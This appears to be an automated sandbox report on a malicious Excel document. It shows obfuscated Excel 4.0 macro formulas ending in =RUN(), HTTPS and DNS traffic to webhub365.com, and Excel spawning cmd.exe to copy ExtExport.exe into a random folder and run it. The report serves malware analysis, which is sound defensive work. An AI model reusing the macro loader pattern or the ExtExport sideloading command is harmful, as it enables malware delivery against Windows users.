,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,I,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,6,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $F$204&$H$481&$K$324&$N$11&$N$11&$E$78&$I$228,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $D$167,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($R$247),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Jun 11, 2021 00:01:02.782792091 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.840646982 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.840765953 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.850260973 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.906337976 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907385111 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907407999 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907428980 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907445908 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.907556057 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.909708023 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.911695957 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.911792994 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.933043003 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:02.994394064 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:02.994493008 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:04.609034061 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:01:04.707235098 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:04.792618036 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:01:04.792836905 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:02:19.796137094 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:02:19.796156883 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:02:19.796312094 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:02:19.796360016 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:03:02.591763020 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:03:02.591799974 CEST49167443192.168.2.22198.244.146.96
          Jun 11, 2021 00:03:02.649141073 CEST44349167198.244.146.96192.168.2.22
          Jun 11, 2021 00:03:02.649348021 CEST49167443192.168.2.22198.244.146.96

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Jun 11, 2021 00:01:02.692508936 CEST5219753192.168.2.228.8.8.8
          Jun 11, 2021 00:01:02.758696079 CEST53521978.8.8.8192.168.2.22
          Jun 11, 2021 00:01:03.308579922 CEST5309953192.168.2.228.8.8.8
          Jun 11, 2021 00:01:03.360682964 CEST53530998.8.8.8192.168.2.22
          Jun 11, 2021 00:01:03.372205019 CEST5283853192.168.2.228.8.8.8
          Jun 11, 2021 00:01:03.423459053 CEST53528388.8.8.8192.168.2.22
          Jun 11, 2021 00:01:04.013695955 CEST6120053192.168.2.228.8.8.8
          Jun 11, 2021 00:01:04.068691969 CEST53612008.8.8.8192.168.2.22
          Jun 11, 2021 00:01:04.076139927 CEST4954853192.168.2.228.8.8.8
          Jun 11, 2021 00:01:04.139476061 CEST53495488.8.8.8192.168.2.22

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Jun 11, 2021 00:01:02.692508936 CEST192.168.2.228.8.8.80x6029Standard query (0)webhub365.comA (IP address)IN (0x0001)

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Jun 11, 2021 00:01:02.758696079 CEST8.8.8.8192.168.2.220x6029No error (0)webhub365.com198.244.146.96A (IP address)IN (0x0001)

          HTTPS Packets

          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
          Jun 11, 2021 00:01:02.911695957 CEST198.244.146.96443192.168.2.2249167CN=webhub365.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Jun 08 19:53:43 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Mon Sep 06 19:53:43 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
          CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
          CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

          Code Manipulations

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          General

          Start time:00:00:38
          Start date:11/06/2021
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f660000
          File size:27641504 bytes
          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:00:00:43
          Start date:11/06/2021
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Imagebase:0x4a6e0000
          File size:345088 bytes
          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:00:00:45
          Start date:11/06/2021
          Path:C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Wow64 process (32bit):true
          Commandline:'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
          Imagebase:0x3a0000
          File size:25600 bytes
          MD5 hash:7F7F391491C315A4A72EFCAC0D34FA93
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 0%, Virustotal, Browse
          • Detection: 2%, Metadefender, Browse
          • Detection: 0%, ReversingLabs
          Reputation:low

          Disassembly

          Code Analysis

          Reset < >